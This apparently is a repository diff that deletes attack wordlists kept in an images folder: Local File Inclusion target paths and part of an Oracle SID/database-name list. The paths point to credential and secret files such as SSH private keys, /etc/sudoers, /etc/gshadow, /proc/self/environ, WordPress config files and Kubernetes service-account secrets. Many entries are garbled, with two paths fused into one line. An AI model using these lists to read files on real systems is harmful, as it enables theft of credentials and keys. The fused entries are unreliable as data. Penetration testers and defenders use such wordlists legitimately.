|
||||||
/private/etc/httpd/httpd.conf
|
|
||||||
/private/etc/httpd/httpd.conf.defaultVolumes/webBackup/opt/apache2/conf/httpd.conf
|
|
||||||
/proc/cmdline
|
|
||||||
/proc/mounts
|
|
||||||
/proc/net/arp
|
|
||||||
/proc/net/route
|
|
||||||
/proc/net/tcp
|
|
||||||
/proc/net/udp
|
|
||||||
/proc/sched_debug
|
|
||||||
/proc/self/cmdline
|
|
||||||
/proc/self/environ
|
|
||||||
/proc/self/fd/0
|
|
||||||
/proc/self/fd/1
|
|
||||||
/proc/self/fd/10
|
|
||||||
/proc/self/fd/11
|
|
||||||
/proc/self/fd/12
|
|
||||||
/proc/self/fd/13
|
|
||||||
/proc/self/fd/14
|
|
||||||
/proc/self/fd/15
|
|
||||||
/proc/self/fd/16
|
|
||||||
/proc/self/fd/17
|
|
||||||
/proc/self/fd/18
|
|
||||||
/proc/self/fd/19
|
|
||||||
/proc/self/fd/2
|
|
||||||
/proc/self/fd/20
|
|
||||||
/proc/self/fd/21
|
|
||||||
/proc/self/fd/22
|
|
||||||
/proc/self/fd/23
|
|
||||||
/proc/self/fd/24
|
|
||||||
/proc/self/fd/25
|
|
||||||
/proc/self/fd/26
|
|
||||||
/proc/self/fd/27
|
|
||||||
/proc/self/fd/28
|
|
||||||
/proc/self/fd/29
|
|
||||||
/proc/self/fd/3
|
|
||||||
/proc/self/fd/30
|
|
||||||
/proc/self/fd/31
|
|
||||||
/proc/self/fd/32
|
|
||||||
/proc/self/fd/33
|
|
||||||
/proc/self/fd/34
|
|
||||||
/proc/self/fd/35
|
|
||||||
/proc/self/fd/36
|
|
||||||
/proc/self/fd/4proc/self/fd/5
|
|
||||||
/proc/self/fd/6
|
|
||||||
/proc/self/fd/7
|
|
||||||
/proc/self/fd/8
|
|
||||||
/proc/self/fd/9
|
|
||||||
/proc/self/stat
|
|
||||||
/proc/self/status
|
|
||||||
/proc/self/statvar/log/apache2/error_log
|
|
||||||
/proc/version
|
|
||||||
/ProgramFilesApacheGroupApache2confhttpd.confProgramFilesxamppapacheconfhttpd.conf
|
|
||||||
/ProgramFilesApacheGroupApachelogserror.logusr/local/apache2/conf/httpd.conf
|
|
||||||
/root/.bash_history
|
|
||||||
/usr/apache2/conf/httpd.conf
|
|
||||||
/usr/apache/conf/httpd.conf
|
|
||||||
/usr/lib/php.ini
|
|
||||||
/usr/lib/php/php.ini
|
|
||||||
/usr/lib/security/mkuser.default
|
|
||||||
/usr/local/apache2/conf/httpd.conf
|
|
||||||
/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log
|
|
||||||
/usr/local/apache2/logs/error_log
|
|
||||||
/usr/local/apache2/logs/error.logvar/log/access_log
|
|
||||||
/usr/local/apache/conf/php.ini
|
|
||||||
/usr/local/apache/httpd.confusr/local/apache2/httpd.conf
|
|
||||||
/usr/local/apache/logs/access_log
|
|
||||||
/usr/local/apache/logs/access.logusr/local/apache/logs/error_log
|
|
||||||
/usr/local/apache/logs/error.log
|
|
||||||
/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf
|
|
||||||
/usr/local/cpanel/logs
|
|
||||||
/usr/local/cpanel/logs/error_log
|
|
||||||
/usr/local/cpanel/logs/license_log
|
|
||||||
/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log
|
|
||||||
/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log
|
|
||||||
/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf
|
|
||||||
/usr/local/etc/apache/conf/httpd.conf
|
|
||||||
/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf
|
|
||||||
/usr/local/etc/apache/vhosts.confetc/php.ini
|
|
||||||
/usr/local/etc/php.ini
|
|
||||||
/usr/local/etc/pure-ftpd.conf
|
|
||||||
/usr/local/etc/pureftpd.pdb
|
|
||||||
/usr/local/httpd/conf/httpd.conf
|
|
||||||
/usr/local/lib/php.iniusr/local/php/lib/php.ini
|
|
||||||
/usr/local/php4/httpd.conf
|
|
||||||
/usr/local/php4/httpd.conf.php
|
|
||||||
/usr/local/php4/lib/php.ini
|
|
||||||
/usr/local/php5/httpd.conf
|
|
||||||
/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf
|
|
||||||
/usr/local/php5/lib/php.ini
|
|
||||||
/usr/local/php/httpd.conf.php
|
|
||||||
/usr/local/pureftpd/etc/pure-ftpd.conf
|
|
||||||
/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl
|
|
||||||
/usr/local/Zend/etc/php.ini
|
|
||||||
/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/
|
|
||||||
/usr/ports/ftp/pure-ftpd/
|
|
||||||
/usr/ports/net/pure-ftpd/
|
|
||||||
/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf
|
|
||||||
/var/adm/log/xferlog
|
|
||||||
/var/cpanel/cpanel.config
|
|
||||||
/var/lib/mysql/my.cnf
|
|
||||||
/var/local/www/conf/php.inietc/php/cgi/php.ini
|
|
||||||
/var/log/access.log
|
|
||||||
/var/log/apache2/access.log
|
|
||||||
/var/log/apache2/access_logvar/log/httpd/error_log
|
|
||||||
/var/log/apache/error.log
|
|
||||||
/var/log/cron.logvar/log/couchdb/couch.log
|
|
||||||
/var/log/dmessage
|
|
||||||
/var/log/error_log
|
|
||||||
/var/log/error.logvar/log/apache/access_log
|
|
||||||
/var/log/exim4/mainlog
|
|
||||||
/var/log/exim4_mainlog
|
|
||||||
/var/log/exim4/paniclog
|
|
||||||
/var/log/exim_mainlog
|
|
||||||
/var/log/exim/mainlogvar/log/maillog
|
|
||||||
/var/log/exim/paniclog
|
|
||||||
/var/log/exim_paniclog
|
|
||||||
/var/log/exim/rejectlog
|
|
||||||
/var/log/exim_rejectlog
|
|
||||||
/var/log/ftplog
|
|
||||||
/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy
|
|
||||||
/var/log/httpd/access.log
|
|
||||||
/var/log/httpd/access_log
|
|
||||||
/var/log/httpd/error.log
|
|
||||||
/var/log/mail
|
|
||||||
/var/log/mail.log
|
|
||||||
/var/log/messages
|
|
||||||
/var/log/mysqlderror.logvar/log/mysql/mysql.log
|
|
||||||
/var/log/mysql.log
|
|
||||||
/var/log/mysql/mysql-bin.log
|
|
||||||
/var/log/mysql/mysql-slow.log
|
|
||||||
/var/log/news
|
|
||||||
/var/log/nginx/access.logproc/self/cmdline
|
|
||||||
/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log
|
|
||||||
var/log/postgresql/postgresql-9.6-mail.log
|
|
||||||
/var/log/proftpd
|
|
||||||
/var/log/pureftpd.log
|
|
||||||
/var/log/pure-ftpd/pure-ftpd.log
|
|
||||||
/var/log/qmail
|
|
||||||
/var/log/redis/redis-server.log
|
|
||||||
/var/log/samba/log.smbd
|
|
||||||
/var/log/smtpd
|
|
||||||
/var/log/spooler
|
|
||||||
/var/log/syslog
|
|
||||||
/var/log/telnetd
|
|
||||||
/var/mail/root
|
|
||||||
/var/mysql.log
|
|
||||||
/var/spool/cron/crontabs/root
|
|
||||||
/var/www/conf/httpd.conf
|
|
||||||
/var/www/logs/access_logvar/www/logs/access.log
|
|
||||||
/var/www/logs/error.log
|
|
||||||
/var/www/logs/error_log
|
|
||||||
/var/www/mgr/logs/access.log
|
|
||||||
/var/www/mgr/logs/error_log
|
|
||||||
/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log
|
|
||||||
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
|
|
||||||
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf
|
|
||||||
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
|
|
||||||
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
|
|
||||||
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
|
|
||||||
/Volumes/webBackup/private/etc/httpd/httpd.conf
|
|
||||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf
|
|
||||||
/web/conf/php.ini
|
|
||||||
/WINDOWSphp.iniWINNTphp.ini
|
|
||||||
/xamppapachebinphp.ini
|
|
||||||
Binary file not shown.
@ -1,430 +0,0 @@
|
|||||||
/apache/logs/access.log
|
|
||||||
/apache/logs/access_log
|
|
||||||
/apache/logs/error.log
|
|
||||||
/apache/logs/error_log
|
|
||||||
~/.atfp_history
|
|
||||||
~/.bash_history
|
|
||||||
~/.bash_logout
|
|
||||||
~/.bash_profile
|
|
||||||
~/.bashrc
|
|
||||||
/bin/php.ini
|
|
||||||
/defaultVolumes/webBackup/opt/apache2/conf/httpd.conf
|
|
||||||
/etc/anaconda-ks.cfg
|
|
||||||
/etc/anacrontab
|
|
||||||
/etc/apache2/apache2.conf
|
|
||||||
/etc/apache2/conf/httpd.conf
|
|
||||||
/etc/apache/conf/httpd.conf
|
|
||||||
/etc/at.allow
|
|
||||||
/etc/at.deny
|
|
||||||
/etc/bashrc
|
|
||||||
/etc/bootptab
|
|
||||||
/etc/centos-release
|
|
||||||
/etc/cesi.conf
|
|
||||||
/etc/chrootUsers
|
|
||||||
/etc/chrootUsersvar/log/xferlog
|
|
||||||
/etc/chttp.conf
|
|
||||||
/etc/cron.allow
|
|
||||||
/etc/cron.deny
|
|
||||||
/etc/crontab
|
|
||||||
/etc/cups/cupsd.conf
|
|
||||||
/etc/debconf.conf
|
|
||||||
/etc/debian_version
|
|
||||||
/etc/dovecot/dovecot.passwd
|
|
||||||
/etc/environment
|
|
||||||
/etc/fstab
|
|
||||||
/etc/ftpaccess
|
|
||||||
/etc/groups
|
|
||||||
/etc/grub.conf
|
|
||||||
/etc/gshadow
|
|
||||||
/etc/hostapd.conf
|
|
||||||
/etc/hostname
|
|
||||||
/etc/hosts.allow
|
|
||||||
/etc/hosts.deny
|
|
||||||
/etc/http/conf/httpd.conf
|
|
||||||
/etc/httpd/access.conf
|
|
||||||
/etc/httpd.conf
|
|
||||||
/etc/httpd/srm.conf
|
|
||||||
/etc/http/httpd.conf
|
|
||||||
/etc/inetd.conf
|
|
||||||
/etc/inittab
|
|
||||||
/etc/lighttpd.conf
|
|
||||||
/etc/lilo.conf
|
|
||||||
/etc/logrotate.d/proftpd
|
|
||||||
/etc/logrotate.d/proftpdwww/logs/proftpd.system.log
|
|
||||||
/etc/lsb-release
|
|
||||||
/etc/master.passwd
|
|
||||||
/etc/modules.conf
|
|
||||||
/etc/motdetc/passwd
|
|
||||||
/etc/mtab
|
|
||||||
/etc/my.conf
|
|
||||||
/etc/mysql/user.MYD
|
|
||||||
/etc/netconfig
|
|
||||||
/etc/network/interfaces
|
|
||||||
/etc/networks
|
|
||||||
/etc/npasswd
|
|
||||||
/etc/ntp.conf
|
|
||||||
/etc/os-release
|
|
||||||
/etc/php4.4/fcgi/php.ini
|
|
||||||
/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini
|
|
||||||
/etc/php4/apache/php.ini
|
|
||||||
/etc/php5/cgi/php.ini
|
|
||||||
/etc/php/apache/php.ini
|
|
||||||
/etc/php/cgi/php.ini
|
|
||||||
/etc/php.ini
|
|
||||||
/etc/php/php4/php.ini
|
|
||||||
/etc/php/php4/php.inietc/php/apache/php.ini
|
|
||||||
/etc/polkit-1/localauthority.conf.d/50-localauthority.conf
|
|
||||||
/etc/polkit-1/localauthority.conf.d/51-debian-sudo.conf
|
|
||||||
/etc/printcap
|
|
||||||
/etc/proftpd/modules.confvar/log/vsftpd.log
|
|
||||||
/etc/proftpd/proftpd.conf
|
|
||||||
/etc/protocols
|
|
||||||
/etc/protpd/proftpd.conf
|
|
||||||
/etc/pureftpd.passwd
|
|
||||||
/etc/pureftpd.pdb
|
|
||||||
/etc/pureftpd.pdbetc/pureftpd.passwd
|
|
||||||
/etc/pure-ftpd/pureftpd.pdb
|
|
||||||
/etc/pure-ftpd/putreftpd.pdb
|
|
||||||
/etc/rsyncd.conf
|
|
||||||
/etc/rsyslog.conf
|
|
||||||
/etc/redhat-release
|
|
||||||
/etc/samba/smb.conf
|
|
||||||
/etc/security/environetc/security/limits
|
|
||||||
/etc/security/group
|
|
||||||
/etc/security/passwd
|
|
||||||
/etc/security/user
|
|
||||||
/etc/services
|
|
||||||
/etc/shells
|
|
||||||
/etc/snmpd.conf
|
|
||||||
/etc/ssh/ssh_host_ecdsa_key
|
|
||||||
/etc/ssh/ssh_host_ecdsa_key.pub
|
|
||||||
/etc/ssh/ssh_host_key
|
|
||||||
/etc/ssh/ssh_host_key.pub
|
|
||||||
/etc/ssh/ssh_host_rsa_key
|
|
||||||
/etc/ssh/ssh_host_rsa_key.pub
|
|
||||||
/etc/sudoers
|
|
||||||
/etc/supervisord.conf
|
|
||||||
/etc/sysconfig/network
|
|
||||||
/etc/sysctl.conf
|
|
||||||
/etc/syslog.conf
|
|
||||||
/etc/system-release
|
|
||||||
/etc/termcap
|
|
||||||
/etc/timezone
|
|
||||||
/etc/tomcat/tomcat-users.xml
|
|
||||||
/etc/updatedb.conf
|
|
||||||
~/.gtkrc
|
|
||||||
/local/apache2/conf/httpd.conf
|
|
||||||
/log/apache2/error_log
|
|
||||||
~/.login
|
|
||||||
~/.logout
|
|
||||||
/logs/access.log
|
|
||||||
/logs/access_log
|
|
||||||
/logs/error.log
|
|
||||||
/logs/error_log
|
|
||||||
/logs/security_debug_log
|
|
||||||
/logs/security_log
|
|
||||||
~/.mysql_history
|
|
||||||
~/.nano_history
|
|
||||||
/opt/apache2/conf/httpd.conf
|
|
||||||
/opt/apache/conf/httpd.conf
|
|
||||||
/opt/lampp/etc/httpd.conf
|
|
||||||
/opt/lampp/logs/access.log
|
|
||||||
/opt/lampp/logs/access_log
|
|
||||||
/opt/lampp/logs/error_log
|
|
||||||
/opt/lampp/logs/error.logopt
|
|
||||||
/opt/xampp/logs/access.log
|
|
||||||
/opt/xampp/logs/error.log
|
|
||||||
/opt/xampp/logs/error_log
|
|
||||||
/php4php.ini
|
|
||||||
/php5php.ini
|
|
||||||
~/.php_history
|
|
||||||
/phpphp.ini
|
|
||||||
/PHPphp.ini
|
|
||||||
/private/etc/httpd/httpd.conf
|
|
||||||
/private/etc/httpd/httpd.conf.
|
|
||||||
/proc/cpuinfo
|
|
||||||
/proc/filesystems
|
|
||||||
/proc/interrupts
|
|
||||||
/proc/ioports
|
|
||||||
/proc/meminfo
|
|
||||||
/proc/modules
|
|
||||||
/proc/self/cmdline
|
|
||||||
/proc/self/cwd/index.php
|
|
||||||
/proc/self/fd/0
|
|
||||||
/proc/self/fd/1
|
|
||||||
/proc/self/fd/10
|
|
||||||
/proc/self/fd/100
|
|
||||||
/proc/self/fd/11
|
|
||||||
/proc/self/fd/12
|
|
||||||
/proc/self/fd/13
|
|
||||||
/proc/self/fd/14
|
|
||||||
/proc/self/fd/15
|
|
||||||
/proc/self/fd/16
|
|
||||||
/proc/self/fd/17
|
|
||||||
/proc/self/fd/18
|
|
||||||
/proc/self/fd/19
|
|
||||||
/proc/self/fd/2
|
|
||||||
/proc/self/fd/20
|
|
||||||
/proc/self/fd/21
|
|
||||||
/proc/self/fd/22
|
|
||||||
/proc/self/fd/23
|
|
||||||
/proc/self/fd/24
|
|
||||||
/proc/self/fd/25
|
|
||||||
/proc/self/fd/26
|
|
||||||
/proc/self/fd/27
|
|
||||||
/proc/self/fd/28
|
|
||||||
/proc/self/fd/29
|
|
||||||
/proc/self/fd/3
|
|
||||||
/proc/self/fd/30
|
|
||||||
/proc/self/fd/31
|
|
||||||
/proc/self/fd/32
|
|
||||||
/proc/self/fd/33
|
|
||||||
/proc/self/fd/34
|
|
||||||
/proc/self/fd/35
|
|
||||||
/proc/self/fd/36
|
|
||||||
/proc/self/fd/37
|
|
||||||
/proc/self/fd/38
|
|
||||||
/proc/self/fd/39
|
|
||||||
/proc/self/fd/4
|
|
||||||
/proc/self/fd/41
|
|
||||||
/proc/self/fd/42
|
|
||||||
/proc/self/fd/43
|
|
||||||
/proc/self/fd/44
|
|
||||||
/proc/self/fd/45
|
|
||||||
/proc/self/fd/46
|
|
||||||
/proc/self/fd/47
|
|
||||||
/proc/self/fd/48
|
|
||||||
/proc/self/fd/49
|
|
||||||
/proc/self/fd/5
|
|
||||||
/proc/self/fd/51
|
|
||||||
/proc/self/fd/52
|
|
||||||
/proc/self/fd/53
|
|
||||||
/proc/self/fd/54
|
|
||||||
/proc/self/fd/55
|
|
||||||
/proc/self/fd/56
|
|
||||||
/proc/self/fd/57
|
|
||||||
/proc/self/fd/58
|
|
||||||
/proc/self/fd/59
|
|
||||||
/proc/self/fd/6
|
|
||||||
/proc/self/fd/61
|
|
||||||
/proc/self/fd/62
|
|
||||||
/proc/self/fd/63
|
|
||||||
/proc/self/fd/64
|
|
||||||
/proc/self/fd/65
|
|
||||||
/proc/self/fd/66
|
|
||||||
/proc/self/fd/67
|
|
||||||
/proc/self/fd/68
|
|
||||||
/proc/self/fd/69
|
|
||||||
/proc/self/fd/7
|
|
||||||
/proc/self/fd/71
|
|
||||||
/proc/self/fd/72
|
|
||||||
/proc/self/fd/73
|
|
||||||
/proc/self/fd/74
|
|
||||||
/proc/self/fd/75
|
|
||||||
/proc/self/fd/76
|
|
||||||
/proc/self/fd/77
|
|
||||||
/proc/self/fd/78
|
|
||||||
/proc/self/fd/79
|
|
||||||
/proc/self/fd/8
|
|
||||||
/proc/self/fd/81
|
|
||||||
/proc/self/fd/82
|
|
||||||
/proc/self/fd/83
|
|
||||||
/proc/self/fd/84
|
|
||||||
/proc/self/fd/85
|
|
||||||
/proc/self/fd/86
|
|
||||||
/proc/self/fd/87
|
|
||||||
/proc/self/fd/88
|
|
||||||
/proc/self/fd/89
|
|
||||||
/proc/self/fd/9
|
|
||||||
/proc/self/fd/91
|
|
||||||
/proc/self/fd/92
|
|
||||||
/proc/self/fd/93
|
|
||||||
/proc/self/fd/94
|
|
||||||
/proc/self/fd/95
|
|
||||||
/proc/self/fd/96
|
|
||||||
/proc/self/fd/97
|
|
||||||
/proc/self/fd/98
|
|
||||||
/proc/self/fd/99
|
|
||||||
/proc/self/net/arp
|
|
||||||
/proc/self/stat
|
|
||||||
/proc/self/status
|
|
||||||
/proc/self/statvar
|
|
||||||
/proc/stat
|
|
||||||
/proc/swaps
|
|
||||||
~/.profile
|
|
||||||
/root/anaconda-ks.cfg
|
|
||||||
/root/.bash_history
|
|
||||||
/root/.ssh/authorized_hosts
|
|
||||||
/root/.ssh/authorized_keys
|
|
||||||
/root/.ssh/id_dsa
|
|
||||||
/root/.ssh/id_rsa
|
|
||||||
/root/.ssh/known_hosts
|
|
||||||
~/.ssh/authorized_keys
|
|
||||||
~/.ssh/id_dsa
|
|
||||||
~/.ssh/id_dsa.pub
|
|
||||||
~/.ssh/identity
|
|
||||||
~/.ssh/identity.pub
|
|
||||||
~/.ssh/id_rsa
|
|
||||||
~/.ssh/id_rsa.pub
|
|
||||||
/usr/apache2/conf/httpd.conf
|
|
||||||
/usr/apache/conf/httpd.conf
|
|
||||||
/usr/etc/pure-ftpd.conf
|
|
||||||
/usr/lib/security/mkuser.default
|
|
||||||
/usr/local/apache2/conf/httpd.conf
|
|
||||||
/usr/local/apache2/log/error_log
|
|
||||||
/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log
|
|
||||||
/usr/local/apache2/logs/error_log
|
|
||||||
/usr/local/apache2/logs/error.logvar/log/access_log
|
|
||||||
/usr/local/apache/audit_log
|
|
||||||
/usr/local/apache/conf/modsec.conf
|
|
||||||
/usr/local/apache/error.log
|
|
||||||
/usr/local/apache/error_log
|
|
||||||
/usr/local/apache/httpd.confusr/local/apache2/httpd.conf
|
|
||||||
/usr/local/apache/log
|
|
||||||
/usr/local/apache/log/error_log
|
|
||||||
/usr/local/apache/logs
|
|
||||||
/usr/local/apache/logs/access.log
|
|
||||||
/usr/local/apache/logs/access.logusr/local/apache/logs/error_log
|
|
||||||
/usr/local/apache/logs/error.log
|
|
||||||
/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf
|
|
||||||
/usr/local/cpanel/logs/access_log
|
|
||||||
/usr/local/cpanel/logs/login_log
|
|
||||||
/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log
|
|
||||||
/usr/local/cpanel/logs/stats_log
|
|
||||||
/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log
|
|
||||||
/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf
|
|
||||||
/usr/local/etc/apache/conf/httpd.conf
|
|
||||||
/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf
|
|
||||||
/usr/local/etc/apache/vhosts.confetc/php.ini
|
|
||||||
/usr/local/etc/httpd/logs/access_log
|
|
||||||
/usr/local/etc/httpd/logs/error_log
|
|
||||||
/usr/local/httpd/conf/httpd.conf
|
|
||||||
/usr/local/lib/php.ini
|
|
||||||
/usr/local/lib/php.iniusr/local/php/lib/php.ini
|
|
||||||
/usr/local/php5/httpd.conf.php
|
|
||||||
/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf
|
|
||||||
/usr/local/php/httpd.conf
|
|
||||||
/usr/local/php/httpd.conf.ini
|
|
||||||
/usr/local/php/httpd.conf.php
|
|
||||||
/usr/local/php/lib/php.ini
|
|
||||||
/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl
|
|
||||||
/usr/local/pureftpd/etc/pureftpd.pdn
|
|
||||||
/usr/local/pureftpd/sbin/pure-config.pl
|
|
||||||
/usr/local/www/logs/httpd_log
|
|
||||||
/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/
|
|
||||||
/usr/ports/ftp/pure-ftpd/
|
|
||||||
/usr/ports/net/pure-ftpd/
|
|
||||||
/usr/sbin/pure-config.pl
|
|
||||||
/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf
|
|
||||||
/usr/var/lib/mysql/debian.cnf
|
|
||||||
/usr/var/lib/mysql/my.cnf
|
|
||||||
/usr/var/lib/mysql/user.MYD
|
|
||||||
/var/apache2/config.inc
|
|
||||||
/var/apache/logs/access_log
|
|
||||||
/var/apache/logs/error_log
|
|
||||||
/var/htmp
|
|
||||||
/var/lib/mysql/debian.cnf
|
|
||||||
/var/lib/mysql/mysql/user.MYD
|
|
||||||
/var/lib/mysql/user.MYD
|
|
||||||
/var/local/www/conf/php.ini
|
|
||||||
/var/local/www/conf/php.inietc/php/cgi/php.ini
|
|
||||||
/var/log/access.log
|
|
||||||
/var/log/apache2/access_log
|
|
||||||
/var/log/apache2/access_logvar/log/httpd/error_log
|
|
||||||
/var/log/apache2/error.log
|
|
||||||
/var/log/apache2/error_log
|
|
||||||
/var/log/apache/access_log
|
|
||||||
/var/log/apache/error_log
|
|
||||||
/var/log/apache-ssl/access.log
|
|
||||||
/var/log/apache-ssl/error.log
|
|
||||||
/var/log/auth.log
|
|
||||||
/var/log/boot
|
|
||||||
/var/log/chttp.log
|
|
||||||
/var/log/cron.logvar/log/couchdb/couch.log
|
|
||||||
/var/log/cups/error.log
|
|
||||||
/var/log/daemon.log
|
|
||||||
/var/log/debug
|
|
||||||
/var/log/dmesg
|
|
||||||
/var/log/dmessage
|
|
||||||
/var/log/dpkg.log
|
|
||||||
/var/log/error_log
|
|
||||||
/var/log/error.logvar/log/apache/access_log
|
|
||||||
/var/log/exim4/mainlog
|
|
||||||
/var/log/exim4_mainlog
|
|
||||||
/var/log/exim4/paniclog
|
|
||||||
/var/log/exim/mainlog
|
|
||||||
/var/log/exim/mainlogvar/log/maillog
|
|
||||||
/var/log/exim.paniclog
|
|
||||||
/var/log/exim/paniclog
|
|
||||||
/var/log/faillog
|
|
||||||
/var/log/ftp-proxy
|
|
||||||
/var/log/ftp-proxy/ftp-proxy.log
|
|
||||||
/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy
|
|
||||||
/var/log/httpsd/ssl.access_log
|
|
||||||
/var/log/httpsd/ssl_log
|
|
||||||
/var/log/kern.log
|
|
||||||
/var/log/lastlog
|
|
||||||
/var/log/lighttpd/access.log
|
|
||||||
/var/log/lighttpd/error.log
|
|
||||||
/var/log/lighttpd/lighttpd.access.log
|
|
||||||
/var/log/lighttpd/lighttpd.error.log
|
|
||||||
/var/log/mail.info
|
|
||||||
/var/log/maillog
|
|
||||||
/var/log/mail.warn
|
|
||||||
/var/log/message
|
|
||||||
/var/log/mysqlderror.log
|
|
||||||
/var/log/mysqlderror.logvar/log/mysql/mysql.log
|
|
||||||
/var/log/mysql/mysql.log
|
|
||||||
/var/log/news
|
|
||||||
/var/log/nginx/access.log
|
|
||||||
/var/log/nginx/access.logproc/self/cmdline
|
|
||||||
/var/log/nginx/error.log
|
|
||||||
/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log
|
|
||||||
/var/log/postgresql/postgresql-9.6-mail.log
|
|
||||||
/var/log/qmail
|
|
||||||
/var/log/redis/redis-server.log
|
|
||||||
/var/log/samba/log.smbd
|
|
||||||
/var/log/secure
|
|
||||||
/var/log/smtpd
|
|
||||||
/var/log/spooler
|
|
||||||
/var/log/sshd.log
|
|
||||||
/var/log/syslog
|
|
||||||
/var/log/telnetd
|
|
||||||
/var/log/wtmp
|
|
||||||
/var/log/xferlog
|
|
||||||
/var/log/yum.log
|
|
||||||
/var/mail/root
|
|
||||||
/var/run/secrets/kubernetes.io/serviceaccount
|
|
||||||
/var/run/utmp
|
|
||||||
/var/webmin/miniserv.log
|
|
||||||
/var/www/conf/httpd.conf
|
|
||||||
/var/www/html/wordpress/wp-config.php
|
|
||||||
/var/www/html/wp/wp-config.php
|
|
||||||
/var/www/log/access_log
|
|
||||||
/var/www/log/error_log
|
|
||||||
/var/www/logs/access.log
|
|
||||||
/var/www/logs/access_log
|
|
||||||
/var/www/logs/access_logvar/www/logs/access.log
|
|
||||||
/var/www/mgr/logs/access.log
|
|
||||||
/var/www/mgr/logs/error_log
|
|
||||||
/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log
|
|
||||||
/var/www/wordpress/wp-config.php
|
|
||||||
/var/www/wp/wp-config.php
|
|
||||||
~/.viminfo
|
|
||||||
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
|
|
||||||
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf
|
|
||||||
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
|
|
||||||
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
|
|
||||||
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
|
|
||||||
/Volumes/webBackup/private/etc/httpd/httpd.conf
|
|
||||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf
|
|
||||||
/web/conf/php.ini
|
|
||||||
/WINDOWSphp.ini
|
|
||||||
/WINNTphp.ini
|
|
||||||
~/.wm_style
|
|
||||||
/xamppapachebinphp.ini
|
|
||||||
/xampp/logs/access_log
|
|
||||||
~/.Xdefaults
|
|
||||||
~/.xinitrc
|
|
||||||
~/.Xresources
|
|
||||||
~/.xsession
|
|
||||||
1008
src/images/lfi2.txt
1008
src/images/lfi2.txt
File diff suppressed because it is too large
Load Diff
Binary file not shown.
File diff suppressed because it is too large
Load Diff
Binary file not shown.
File diff suppressed because it is too large
Load Diff
7703
src/images/posts.txt
7703
src/images/posts.txt
File diff suppressed because it is too large
Load Diff
Binary file not shown.
@ -1,737 +0,0 @@
|
|||||||
|
|
||||||
ADV1
|
|
||||||
ADVCPROD
|
|
||||||
AIX10
|
|
||||||
AIX11
|
|
||||||
AIX9
|
|
||||||
APEX
|
|
||||||
ARIS
|
|
||||||
ASDB
|
|
||||||
ASDB0
|
|
||||||
ASDB1
|
|
||||||
ASDB2
|
|
||||||
ASDB3
|
|
||||||
ASDB4
|
|
||||||
ASDB5
|
|
||||||
ASDB6
|
|
||||||
ASDB7
|
|
||||||
ASDB8
|
|
||||||
ASDB9
|
|
||||||
ASG817
|
|
||||||
ASG817P
|
|
||||||
ASG817T
|
|
||||||
ATRPROD
|
|
||||||
ATRTEST
|
|
||||||
BLA
|
|
||||||
BOOKS
|
|
||||||
BUDGET
|
|
||||||
C630
|
|
||||||
CLRExtProc
|
|
||||||
CTM4_0
|
|
||||||
CTM4_1
|
|
||||||
CTM4_6
|
|
||||||
D
|
|
||||||
D10
|
|
||||||
D8
|
|
||||||
D9
|
|
||||||
DB
|
|
||||||
DB01
|
|
||||||
DB02
|
|
||||||
DB03
|
|
||||||
DB1
|
|
||||||
DB2
|
|
||||||
DB2EDU
|
|
||||||
DB2PROD
|
|
||||||
DB2TEST
|
|
||||||
DB3
|
|
||||||
DBA
|
|
||||||
DBA1
|
|
||||||
DBA2
|
|
||||||
DBA3
|
|
||||||
DBA4
|
|
||||||
DBA5
|
|
||||||
DBA6
|
|
||||||
DBA7
|
|
||||||
DBA8
|
|
||||||
DBA9
|
|
||||||
DBX
|
|
||||||
DEMO
|
|
||||||
DEV
|
|
||||||
DEV0
|
|
||||||
DEV01
|
|
||||||
DEV1
|
|
||||||
DEV2
|
|
||||||
DEV3
|
|
||||||
DEV4
|
|
||||||
DEV5
|
|
||||||
DEV6
|
|
||||||
DEV7
|
|
||||||
DEV8
|
|
||||||
DEV9
|
|
||||||
DEVEL
|
|
||||||
DIA1
|
|
||||||
DIA2
|
|
||||||
DIS
|
